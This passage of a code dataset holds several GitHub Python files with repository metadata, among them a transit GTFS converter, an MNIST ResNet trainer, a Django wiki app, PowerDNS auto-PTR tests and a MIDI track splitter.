weekdays[2], 'thursday': weekdays[3], 'friday': weekdays[4], 'saturday': weekdays[5], 'sunday': weekdays[6], 'start_date': start, 'end_date': end}\n\ndef getTime(time):\n return time[:2] + ':' + time[2:4] + ':' + time[4:]\n\nfor f in os.listdir('.'):\n if not f.endswith('.exp'):\n continue\n print(f)\n for line in open(f, encoding='ISO_8859-15'):\n elements = line.strip().split(';')\n if elements[0] == '1':\n pass\n elif elements[0] == '2':\n pass\n elif elements[0] == '3':\n calendar = getCalendar(elements[2], elements[5], elements[6])\n if not calendar['service_id'] in calendars:\n calendars.append(calendar['service_id'])\n calendar_objs[calendar['service_id']] = calendar\n calendar = calendar['service_id']\n\n elif elements[0] == '4':\n pass\n elif elements[0] == '5':\n if any_stops == False:\n #print ('No stops for ' + trip_id + ' on route ' + route)\n pass\n any_stops = False\n valid = elements[5] == '0'\n if not valid:\n #print('Siirtoajo')\n #print(elements)\n continue\n route = elements[6] + elements[8].translate(digit_trans)\n if route == '':\n print('Empty route' + str(elements))\n if not route in routes:\n routes.append(route)\n trip_id = elements[3]\n if not trip_id in trips:\n trips.append(trip_id)\n direction = str(int(elements[18])-1)\n shape_id = route + \"_\" + elements[18]\n headsign = headsigns[shape_id] if shape_id in headsigns else \"missing!\"\n\n\n trip_objs[trip_id] = {'route_id': route, 'service_id': calendar, 'trip_id': trip_id, 'direction_id': direction, 'shape_id': shape_id, 'trip_headsign': headsign}\n sidx = 1\n else:\n print('Duplicate trip' + trip_id)\n elif elements[0] == '6':\n if valid:\n if elements[3] == '':\n #print(elements)\n continue\n if elements[3] not in stops:\n missing_stops.add(elements[3])\n any_stops = True\n stop_id = elements[3]\n time = getTime(elements[8])\n timepoint = elements[11] == 'a' and '1' or '0'\n stoptimes.append({'trip_id': trip_id, 'arrival_time': time, 'departure_time': time, 'stop_id': stop_id, 'stop_sequence': sidx,'timepoint': timepoint})\n sidx += 1\n\nimport csv\n\nwith open('gtfs/calendar.txt', 'w') as csvfile:\n fieldnames = ['service_id', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', 'start_date', 'end_date']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for calendar in calendar_objs.values():\n writer.writerow(calendar)\n\nwith open('gtfs/routes.txt', 'w') as csvfile:\n fieldnames = ['route_id', 'route_short_name', 'route_type', 'agency_id']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for route in routes:\n route_short_name = ''\n route_type = ''\n if route[0] == '3':\n route_short_name = route[4]\n route_type = '2'\n elif route[0:4] == '1300':\n route_short_name = 'Metro'\n route_type = '1'\n elif route[0:4] == '1019':\n route_short_name = 'Lautta'\n route_type = '4'\n else:\n route_short_name = route[1:].lstrip('0')\n route_type = '3'\n writer.writerow({'route_id': route, 'route_short_name': route_short_name, 'route_type': route_type,'agency_id': 'HSL'})\n\n\nwith open('gtfs/trips.txt', 'w') as csvfile:\n fieldnames = ['route_id', 'service_id', 'trip_id', 'direction_id', 'trip_headsign', 'shape_id']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for trip in trip_objs.values():\n writer.writerow(trip)\n\nwith open('gtfs/stop_times.txt', 'w') as csvfile:\n fieldnames = ['trip_id', 'stop_id', 'arrival_time', 'departure_time', 'stop_sequence', 'timepoint']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for stoptime in stoptimes:\n writer.writerow(stoptime)\n\nwith open('gtfs/missing_stops.txt', 'w') as csvfile:\n fieldnames = ['stop_id']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for stop in missing_stops:\n writer.writerow({'stop_id': stop})\n","repo_name":"HSLdevcom/hastus2gtfs","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5935,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"73793534561","text":"\nfrom models import BasicModel, LocalEnvironment\nfrom torch.utils.data import DataLoader, Dataset\nfrom typing import Tuple \nfrom torchvision import datasets,transforms\nimport torch\nimport torch.nn.functional as F\n\n#模块搭建\nclass ResBlock(torch.nn.Module):\n def __init__(self,channels_in):\n super().__init__()\n self.conv1=torch.nn.Conv2d(channels_in,30,5,padding=2)\n self.conv2=torch.nn.Conv2d(30,channels_in,3,padding=1)\n\n def forward(self,x):\n out=self.conv1(x)\n out=self.conv2(out)\n return F.relu(out+x)\n\nclass ResNetMNIST(BasicModel):\n \n def __init__(self, local_num_epoch=5) -> None:\n super().__init__(local_num_epoch)\n self.conv1=torch.nn.Conv2d(1,20,5)\n self.conv2=torch.nn.Conv2d(20,15,3)\n self.maxpool=torch.nn.MaxPool2d(2)\n self.resblock1=ResBlock(channels_in=20)\n self.resblock2=ResBlock(channels_in=15)\n self.full_c=torch.nn.Linear(375,10)\n\n def client_init(self, env: LocalEnvironment):\n super().client_init(env)\n env.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n \n \n def forward(self, x):\n size=x.shape[0]\n x=F.relu(self.maxpool(self.conv1(x)))\n x=self.resblock1(x)\n x=F.relu(self.maxpool(self.conv2(x)))\n x=self.resblock2(x)\n x=x.view(size,-1)\n x=self.full_c(x)\n return x\n \n \n def get_dataloader(self) -> Tuple[DataLoader]:\n batch = 100\n trans=transforms.Compose([transforms.ToTensor(),transforms.Normalize(0.15,0.30)])\n train_set=datasets.MNIST(\"~/datasets/MNIST\",train=True,download=True,transform=trans)\n train_loader=DataLoader(train_set,batch_size=batch,shuffle=True,num_workers=4)\n test_set=datasets.MNIST(\"~/datasets/MNIST\", train=False,download=True,transform=trans)\n test_loader=DataLoader(test_set,batch_size=batch,num_workers=4)\n return train_loader, test_loader\n\n \n def local_train(self, env: LocalEnvironment):\n criterion=torch.nn.CrossEntropyLoss()\n optimizer=torch.optim.Adam(self.parameters(),lr=0.005)\n scheduler=torch.optim.lr_scheduler.ExponentialLR(optimizer,gamma=0.999)\n data_size = 0\n for epoch in range(self.local_num_epoch):\n for batch_index,data in enumerate(env.train_loader,0):\n l=0.0\n data_size += len(data)\n train_data,train_labels=data\n train_data, train_labels = train_data.to(env.device), train_labels.to(env.device)\n optimizer.zero_grad()\n pred_data=self.forward(train_data)\n loss=criterion(pred_data,train_labels)\n loss.backward()\n l+=loss.item()\n optimizer.step()\n scheduler.step()\n if batch_index%100==0:\n print(\"epoch:\",epoch,\"batch_index:\",batch_index/100,\"loss:\",l)\n self.data_size =data_size\n \n \n def test(self, env: LocalEnvironment):\n\n eval_msg = \"\"\n with torch.no_grad():\n correct=0.0\n total=0.0\n for batch_index,data in enumerate(env.test_loader,0):\n test_data,test_labels=data\n test_data, test_labels = test_data.to(env.device), test_labels.to(env.device)\n pred_data=self.forward(test_data)\n _,pred_labels=torch.max(pred_data,dim=1)\n total+=test_labels.shape[0]\n correct+=(pred_labels==test_labels).sum().item()\n if batch_index%10==0:\n eval_msg += f\"测试进度: {100.0*batch_index/100} %\\n\"\n eval_msg += f\"准确率为: {correct*100.0/total} %\\n\"\n return eval_msg\n \n def save(self):\n \n return super().save()\n \n \nclass ResNetCIFAR10(BasicModel):\n \n def __init__(self, local_num_epoch=5) -> None:\n super().__init__(local_num_epoch)\n \n def get_dataloader(self) -> Tuple[DataLoader]:\n return super().get_dataloader()\n \n def local_train(self, env: LocalEnvironment) -> int:\n return super().local_train(env)\n \n def test(self, env: LocalEnvironment):\n return super().test(env)","repo_name":"yzzer123/FedRaft","sub_path":"Trainer/models/Examples.py","file_name":"Examples.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"20940785277","text":"# ## Exercise 1\n# 1. Create a python file with 3 functions:\n# 1. `def print_file_content(file)` that can print content of a csv file to the console\n# 2. `def write_list_to_file(output_file, lst)` that can take a list of tuple and write each element to a new line in file\n# 1. rewrite the function so that it gets an arbitrary number of strings instead of a list\n# 3. `def read_csv(input_file)` that take a csv file and read each row into a list\n# 2. Add a functionality so that the file can be called from cli with 2 arguments\n# 1. path to csv file\n# 2. an argument `--file file_name` that if given will write the content to file_name or otherwise will print it to the console.\n# 3. Add a --help cli argument to describe how the module is used\nfrom PythonProjects.utils import webget\nimport argparse\nimport csv\n\n\ndef print_file_content(file):\n \"\"\"1. `def print_file_content(file)` that can print content of a csv file to the console\"\"\"\n # It should be able to print content of a csv file to console.\n\n with open(file) as f:\n reader = csv.reader(f)\n\n for row in reader:\n print(str(row))\n\n# testing 1.\n# filename = './iris_csv.csv'\n# print_file_content(filename)\n# ^Works\n\n\ndef write_list_to_file(output_file, *args):\n \"\"\"`def write_list_to_file(output_file, lst)` \n that can take a list of tuple \n and write each element to a new line in file\"\"\"\n # rewrite the function so that it gets an arbitrary number of strings instead of a list\n\n toFile = \"\"\n for x in args:\n toFile += x + \"\\n\"\n\n with open(output_file, 'w') as file_object:\n print(\"Writing {} to {}\".format(toFile, output_file))\n file_object.write(toFile)\n\n\n# Testing write_list_to_file\n# testStringOne = \"First Line\"\n# testStringTwo = \"Second Line\"\n# testStringThree = \"Third Line\"\n\n# filename = \"testFile.txt\"\n\n# print(\"\\n___________________________________________\\nSecond Test::\\n\")\n# write_list_to_file(filename, testStringOne, testStringTwo, testStringThree)\n# ^Works\n\n# `def read_csv(input_file)` that take a csv file and read each row into a list\n\n\ndef read_csv(input_file):\n list = []\n with open(input_file) as f:\n reader = csv.reader(f)\n\n for row in reader:\n list.append(row)\n\n return list\n\n\n# print(\"\\n___________________________________________\\nThird Test::\\n\")\n# filename = \"iris_csv.csv\"\n# print(read_csv(filename))\n\n# 2. Add a functionality so that the file can be called from cli with 2 arguments\n# 1. path to csv file\n# 2. an argument `--file file_name` that if given will write the content to file_name or otherwise will print it to the console.\n# Add a --help cli argument to describe how the module is used\nparser = argparse.ArgumentParser(\n description='A program that can handle CSV')\n\n# Positional arg\nparser.add_argument('path', help='path to csv file')\n\n# Optional Arg [- , --]\nparser.add_argument('-f', '--file_name',\n help='if given will write the content to file_name or otherwise will print it to the console.')\n\n\nargs = parser.parse_args()\n\n\ndef listToString(s):\n str1 = \",\"\n return (str1.join(s))\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n\n path = args.path\n\n myContent = read_csv(path)\n\n content = \"\"\n\n for x in myContent:\n content += listToString(x) + \"\\n\"\n\n if (args.file_name != None):\n file_name = args.file_name\n # write the content to file_name\n with open(file_name, 'w') as file_object:\n\n print(\"Writing {} to {}\".format(content, file_name))\n file_object.write(content)\n else:\n # Print it to console\n print_file_content(path)\n","repo_name":"MalteMagnussen/PythonProjects","sub_path":"week2/Exercises/one.py","file_name":"one.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31169787218","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'HentaiSaru'\n\nfrom cx_Freeze import setup, Executable\nimport sys\n\nbase = None\nif sys.platform == \"win32\":\n base = \"Win32GUI\"\n\nsetup(name='DriverDetection',\n version='1.0',\n description='update detection',\n options={\"build_exe\": {\"includes\": [\"lxml.etree\", \"requests\", \"GPUtil\", \"re\", \"os\", \"tkinter.messagebox\"]}},\n executables=[Executable(\"GPU_UpdateReminder.pyw\", base=base ,icon=\"nvidia.ico\")]\n )","repo_name":"TenshinoOtoKafu/Implementation-Project","sub_path":"python Implementation/顯卡驅動更新提醒/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1585769778","text":"def solution(s):\n answer = []\n\n n=[]\n for i in range(len(s)):\n if s[i] in n:\n answer.append(i-s[:i].rindex(s[i]))\n else:\n n.append(s[i])\n answer.append(-1)\n\n return answer","repo_name":"Mindlestick/CodingTest","sub_path":"Programmers/가장 가까운 같은 글자.py","file_name":"가장 가까운 같은 글자.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19469729123","text":"from django.urls import path\n\nfrom dark.views.user import UserRegistrationView, UserLoginView, UserLogoutView\n\n\nclass UserSite:\n def get_urls(self):\n urlpatterns = [\n path('register/', UserRegistrationView.as_view(), name='register'),\n path('login/', UserLoginView.as_view(template_name='dark/user/login.html'), name='login'),\n path('logout/', UserLogoutView.as_view(template_name='dark/user/logout.html'), name='logout'),\n ]\n\n return urlpatterns\n\n @property\n def urls(self):\n return self.get_urls(), 'user', 'user'\n\n\nsite = UserSite()\n","repo_name":"DARK-development-team/DARK","sub_path":"dark/urls/user/sites.py","file_name":"sites.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41428710162","text":"import MDAnalysis\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport Analyze_file_info\nimport pandas as pd\nfrom cycler import cycler\ndef plot_axes(x, y, ax, **kwargs):\n \"\"\"plot two arrays with a certain style in the current axes\"\"\"\n return None\n\ndef get_temp_arrays_from_file(**kwargs):\n \"\"\"plots arrays from a parameter file\"\"\"\n return None\n\ndef get_cmap(n, name='hsv'):\n '''Returns a function that maps each index in 0, 1, ..., n-1 to a distinct\n RGB color; the keyword argument name must be a standard mpl colormap name.\n\n Args:\n n (TYPE): Description\n name (str, optional): Description\n\n Returns:\n TYPE: Description\n '''\n return plt.cm.get_cmap(name, n)\n\n\n\n# for myfile in fileslist:\n # get arrays using get_temp_arrays_from_file\n # finish everything\n\n # folder = '/Users/bazilevs/Work/cedar/17-12-08/rerun_profiles/'\nfolder = '/Users/bazilevs/Work/cedar/18-06-12_energy_density_curves/'\n\n# entypelist = [ 'gelpair', 'allpair', 'cipair']\nentypelist = ['cipair']\n# for simtype in ['coul', 'total', 'lj']:\n# for simtype in ['coul', 'lj']:\n# for entype in entypelist:\n# print( simtype)\n# plot_energy_for_type(folder, myenergytype=entype, simtype=simtype)\nsimtype = 'cipair'\ntemp_name_array = ['01','02','03','04','05','06','07','08','09','10','11']\ntemp_color_array = get_cmap(len(temp_name_array))\ngelname = 'sc1844_nm100_l50_fl01_fr1'\n# params_dict = vars(args)\nmyenergytype = 'coul'\nparams = {\n'folder' : folder,\n'energytype' : myenergytype,\n'gelname' : gelname,\n'simtype' : simtype,\n'scale_power' : 3,\n}\nscale_factor = 10.**params['scale_power']\n\n# get_cmap\n# frho = plt.figure(1)\n# fz = plt.figure(2)\n# # fz.clf()\n# frho.clf()\n# axrho = frho.add_subplot(111)\n\n# axz1 = fz.add_subplot(211)\n# axz2 = fz.add_subplot(212)\n\n# if simtype is 'coul':\n# axz = axz1\n# else:\n# axz = axz2\ncc = (cycler(color=list('rgb')) *\n cycler(linestyle=['-', '--', '-.']))\n\nfor _tname in temp_name_array:\n params['tempname'] = _tname\n mystring = \"{0[folder]}/{0[gelname]}_t{0[tempname]}.csv\".format(params)\n df = pd.read_csv(mystring)\n plt.plot(df['Coord1'], df['NumDensity_ci'])\n\nplt.show()\n # params_dict['temp_name_array'] = temp_name_array\n # params_dict['ax_dict'] = ax_dict\n # params_dict['fig_dict'] = fig_dict\n # for myfile in params_dict['myfiles_list']:\n # c = files_color_dict[myfile]\n # params_dict['myfile'] = myfile\n # temp_array, phi3_array_pure, conc_divide_array, f_divide_array, q1_q2_param_array, press_array,work_array, pzz_array, fillstyle = get_arrays_from_file(**params_dict)\n","repo_name":"bazilevs31/pygels","sub_path":"analyze/archive/energy_density.py","file_name":"energy_density.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31432011173","text":"def prepareData():\n global deptList, studentList\n matrials = Dept(100,\"신소재\")\n mechanics = Dept(200,\"기계공학과\")\n deptList= [matrials, mechanics]\n studentList = []\n studentList.append(Student(101,\"신철수\",matrials))\n studentList.append(Student(102,\"신정철\",matrials))\n studentList.append(Student(201,\"기대승\",mechanics))\n studentList.append(Student(202,\"기정은\",mechanics))\n\nclass Dept:\n def __init__(self, deptNo, name):\n self.deptNo = deptNo\n self.name = name\n def __str__(self):\n result = \"(\"+str(self.deptNo) + \" \" + self.name+ \")\"\n return result\n \nclass Student:\n def __init__(self, studentNo, name, dept):\n self.studentNo = studentNo\n self.name = name\n self.dept = dept\n def __str__(self):\n result = \"(\"+str(self.studentNo) + \" \"\n result += self.name + \" \" + self.dept.name + \")\"\n return result\n\ndef main():\n prepareData()\n print(\"=\"*10,\"All Departments List\")\n for dept in deptList:\n print(dept)\n print(\"=\"*10,\"All Students List\")\n for student in studentList:\n print(student)\nmain()","repo_name":"parkjin7888/first-repository","sub_path":"practice_4.py","file_name":"practice_4.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36442329857","text":"from django.http.response import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django import forms\nfrom django.urls import reverse\nimport random\nimport markdown2\nfrom django.shortcuts import redirect\n\nfrom . import util\n\nclass NewPageForm(forms.Form):\n pageTitle = forms.CharField(label=\"Title\" )\n content = forms.CharField(widget=forms.Textarea, label=\"Content\")\n\nclass EditPage(forms.Form):\n text = forms.CharField(widget=forms.Textarea, initial='class', label=\"Content\")\n\n\ndef index(request):\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\n\ndef page(request, title):\n page = util.get_entry(title)\n \n if page == None:\n return render(request, \"encyclopedia\\error.html\")\n\n else:\n html = markdown2.markdown_path(f\"entries/{title}.md\")\n return render(request, \"encyclopedia/page.html\", {\n \"page\" : html,\n \"title\" : title\n })\n \n\ndef search(request):\n if request.method == \"POST\":\n q = request.POST['q'].casefold()\n\n entries = [x.casefold() for x in util.list_entries()]\n search_list = []\n\n if q in entries:\n q = request.POST['q']\n return redirect('title', title=q)\n\n else:\n for entry in util.list_entries():\n if (entry.casefold().find(q) != -1):\n search_list.append(entry)\n \n return render(request, \"encyclopedia/search.html\", {\n \"entries\": search_list\n })\n\ndef newPage(request):\n if request.method == \"GET\":\n return render(request, \"encyclopedia/newpage.html\", {\n \"form\": NewPageForm()\n })\n\n else:\n form = NewPageForm(request.POST)\n if form.is_valid():\n title = form.cleaned_data[\"pageTitle\"].casefold()\n content = form.cleaned_data[\"content\"]\n\n if title in [x.casefold() for x in util.list_entries()]:\n return render(request, \"encyclopedia/newpage.html\", {\n \"form\": form,\n \"error\" : \"Title already exists. Choose another title.\"\n })\n \n else:\n title = form.cleaned_data[\"pageTitle\"]\n util.save_entry(title, content)\n return redirect('title', title=title)\n\ndef randomPage(request):\n randomPage = random.choice(util.list_entries())\n return redirect('title', title=randomPage)\n\n\ndef editPage(request, title):\n if request.method == \"GET\":\n content = util.get_entry(title)\n return render(request, \"encyclopedia/edit.html\", {\n \"form\" : EditPage(initial={'text': content}),\n \"title\" : title\n })\n\n else:\n form = EditPage(request.POST)\n if form.is_valid():\n content = form.cleaned_data[\"text\"]\n util.save_entry(title, content)\n return redirect('title', title=title)\n ","repo_name":"abnlfazal/portfolio","sub_path":"wiki/encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14089691467","text":"import subprocess\nimport time\nimport argparse\nimport numpy as np\nimport os\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"output\")\n args = parser.parse_args()\n my_env = os.environ.copy()\n confs = []\n for i in [0.5, 0.9, 1.0, 1.1, 3.0]:\n for j in [0.5, 0.9, 1.0, 1.1, 3.0]:\n for k in [0.5, 0.9, 1.0, 1.1, 3.0]:\n confs.append((i, j, k))\n\n for index, (i, j, k) in enumerate(confs):\n print(\"{}/{}\".format(index, len(confs)))\n with open(args.output + \"{}_{}_{}.txt\".format(i, j, k), \"wb\") as fout:\n my_env[\"DALI_JIT_ALWAYS_RECOMPILE\"] = \"true\"\n my_env[\"DALI_JIT_THREAD_WEIGHT\"] = \"{}\".format(i)\n my_env[\"DALI_JIT_BLOCK_WEIGHT\"] = \"{}\".format(j)\n my_env[\"DALI_JIT_THREADBLOCK_WEIGHT\"] = \"{}\".format(k)\n out = subprocess.check_output(\"/home/jonathanraiman/Coding/dali-examples/build/mnist_training --device 0 --use_cudnn --use_jit_fusion --epochs 3\".split(),\n env=my_env)\n fout.write(out)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dali-ml/dali-examples","sub_path":"examples/run_many_confs.py","file_name":"run_many_confs.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72313195360","text":"\"\"\"Tests for auto_ptr feature\"\"\"\n\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase\n\nfrom powerdns.models.powerdns import Domain, Record\nfrom powerdns.tests.utils import (\n DomainFactory,\n DomainTemplateFactory,\n RecordFactory,\n RecordTemplateFactory,\n assert_does_exist,\n assert_not_exists,\n)\nfrom powerdns.utils import AutoPtrOptions\n\n\nclass TestAutoPtr(TestCase):\n \"\"\"Tests for auto_ptr feature\"\"\"\n\n def setUp(self):\n self.user = User.objects.create_superuser(\n 'user', 'user1@example.com', 'password'\n )\n self.reverse_template = DomainTemplateFactory(name='reverse')\n self.alt_reverse_template = DomainTemplateFactory(name='reverse 2')\n self.soa_record = RecordTemplateFactory(\n type='SOA',\n name='{domain-name}',\n content=(\n 'ns1.{domain-name} hostmaster.{domain-name} '\n '0 43200 600 1209600 600'\n ),\n domain_template = self.reverse_template,\n )\n self.alt_soa_record = RecordTemplateFactory(\n type='SOA',\n name='{domain-name}',\n content=(\n 'nameserver1.{domain-name} hostmaster.{domain-name} '\n '0 43200 1200 1209600 1200'\n ),\n domain_template = self.alt_reverse_template,\n )\n self.domain = DomainFactory(\n name='example.com',\n template=None,\n reverse_template=None,\n type='NATIVE',\n )\n\n def tearDown(self):\n for Model in [Domain, Record, User]:\n Model.objects.all().delete()\n\n def test_default_ptr_created(self):\n \"\"\"A PTR record is created for an A record with default template\"\"\"\n RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ALWAYS,\n owner=self.user,\n )\n domain = Domain.objects.get(name='1.168.192.in-addr.arpa')\n self.assertEqual(domain.type, 'NATIVE')\n self.assertTrue(domain.get_soa().content.endswith('600'))\n assert_does_exist(\n Record,\n domain=domain,\n name='1.1.168.192.in-addr.arpa',\n owner=self.user,\n )\n\n def test_auto_ptr_edit(self):\n \"\"\"PTR changes when A changes\"\"\"\n record = RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ALWAYS,\n )\n record.content = '192.168.1.9'\n record.save()\n domain = Domain.objects.get(name='1.168.192.in-addr.arpa')\n assert_does_exist(\n Record,\n domain=domain,\n name='9.1.168.192.in-addr.arpa',\n )\n assert_not_exists(\n Record,\n domain=domain,\n name='1.1.168.192.in-addr.arpa',\n )\n\n def test_auto_ptr_off(self):\n \"\"\"PTR is removed when setting auto_ptr to NEVER\"\"\"\n record = RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ALWAYS,\n )\n domain = Domain.objects.get(name='1.168.192.in-addr.arpa')\n record.auto_ptr = AutoPtrOptions.NEVER\n record.save()\n assert_not_exists(\n Record,\n domain=domain,\n name='1.1.168.192.in-addr.arpa',\n )\n\n def test_default_ptr_never(self):\n \"\"\"A PTR record is not created if auto_ptr set to NEVER\"\"\"\n domain = DomainFactory(name='1.168.192.in-addr.arpa')\n RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.NEVER,\n )\n assert_not_exists(\n Record,\n domain=domain,\n name='1.1.168.192.in-addr.arpa'\n )\n\n def test_ptr_domain_exists(self):\n \"\"\"A PTR record with 'only-if-domain' is created if domain exists\"\"\"\n domain = DomainFactory(name='1.168.192.in-addr.arpa')\n RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ONLY_IF_DOMAIN,\n )\n assert_does_exist(\n Record,\n domain=domain,\n name='1.1.168.192.in-addr.arpa'\n )\n\n def test_ptr_domain_not_exists(self):\n \"\"\"A PTR record with 'only-if-domain' is created if domain exists\"\"\"\n RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ONLY_IF_DOMAIN,\n )\n assert_not_exists(\n Record,\n name='1.1.168.192.in-addr.arpa'\n )\n\n def test_alt_ptr_created(self):\n \"\"\"A PTR record is created for an A record with alternative\"\"\"\n self.domain.reverse_template = self.alt_reverse_template\n RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ALWAYS,\n )\n domain = Domain.objects.get(name='1.168.192.in-addr.arpa')\n self.assertTrue(domain.get_soa().content.endswith('1200'))\n\n def test_ptr_autoremove(self):\n \"\"\"A PTR record is automatically removed with its A record\"\"\"\n a = RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ALWAYS,\n )\n assert_does_exist(Record, name='1.1.168.192.in-addr.arpa', type='PTR')\n a.delete()\n assert_not_exists(Record, name='1.1.168.192.in-addr.arpa', type='PTR')\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/allegro/django-powerdns-dnssec/powerdns/tests/test_auto_ptr.py","file_name":"test_auto_ptr.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34622604031","text":"import pygame\nimport numpy as np\nimport cv2 as cv\nfrom scripts.core.node_detail import NodeDetail\n\nclass BSInvert(NodeDetail):\n def __init__(self, color_bg: pygame.Color, image: np.matrix) -> None:\n self.node_name = \"Invert\"\n self.color_bg = color_bg\n self.size_panel_config = pygame.Rect(0, 0, 100, 30)\n super().__init__(self.node_name, self.color_bg, image)\n\n def __apply_effect(self):\n self.image_apply = cv.bitwise_not(self.image_apply)\n \n if self.image_apply.ndim < 3:\n self.image_display = cv.cvtColor(self.image_apply.copy(), cv.COLOR_GRAY2RGB)\n else:\n self.image_display = self.image_apply.copy()\n \n def set_image(self, image_cv: np.matrix) -> None:\n self.image_raw = image_cv.copy()\n self.image_apply = image_cv.copy()\n self.image_display = image_cv.copy()\n self.__apply_effect()\n super().set_image(image_cv)\n \n def set_params(self):\n pass","repo_name":"kiritoroo/node-opencv-explor","sub_path":"scripts/factory/base/bs_invert.py","file_name":"bs_invert.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13462353872","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\ndef bishop(idx,cnt,color):\r\n if idx == 2 * n:\r\n ans[color] = max(ans[color],cnt)\r\n return\r\n for x,y in board[color][idx]:\r\n if used[color][x + y]:\r\n continue\r\n used[color][x+y] = True\r\n bishop(idx + 1, cnt + 1, color)\r\n used[color][x+y] = False\r\n bishop(idx + 1, cnt, color)\r\n \r\nn = int(input())\r\nans = [0,0]\r\nboard = [[[] for _ in range(2 * n) ] for _ in range(2)]\r\nused = [[False] * (2 * n) for _ in range(2)]\r\nfor r in range(n):\r\n inp = list(map(int,input().split()))\r\n for c,v in enumerate(inp):\r\n if v == 1:\r\n # \\ 방향 대각선\r\n board[(r + c + 1) % 2][n + r - c - 1].append((r,c)) \r\n\r\nbishop(0,0,0)\r\nbishop(0,0,1)\r\n\r\nprint(sum(ans))","repo_name":"yootal/CodingTest","sub_path":"백준/Gold/1799. 비숍/비숍.py","file_name":"비숍.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28597784202","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Nissimol Aji\n\"\"\"\n\nimport os\nfrom mido import MidiFile,MidiTrack\n\n\n'''\n\nMidiSplit class, splits the midi files into individual midi file track\n'''\nclass MidiSplit:\n \n def split_midi_tracks(midi_file,output_path):\n try:\n file=os.path.basename(midi_file)\n file_name = os.path.splitext(file)[0]\n mid = MidiFile(midi_file,clip=True)\n path = output_path + str(file_name)\n os.mkdir(path) \n original_channel = MidiFile()\n original_channel.ticks_per_beat=mid.ticks_per_beat\n \n channel_present = False\n channel_absent =False\n count =0 \n for i,track in enumerate(mid.tracks): \n \n if len(track.name) == 0:\n track.name = \"piano track \"+str(count)\n count = count+1\n print('Track {}: {}'.format(i, track.name))\n \n \n\n instrument_channel = MidiFile() # getting the current track\n instrument_channel.ticks_per_beat = mid.ticks_per_beat\n \n for msg in track:\n if msg.is_meta ==False:\n try:\n if msg.channel >=0:\n channel_absent = False\n channel_present = True\n break\n else:\n channel_present = False\n except:\n channel_present=False\n else:\n channel_present =False\n if channel_present ==True:\n instrument_channel.tracks.append(track)\n original_channel.tracks.append(track)\n \n instrument_channel.save(output_path+'/'+str(file_name) +'/'+str(track.name)+ '.mid')\n original_channel.save(output_path+'/'+str(file_name) +'/'+ str(file_name)+ '.mid')\n \n return path,mid \n except:\n 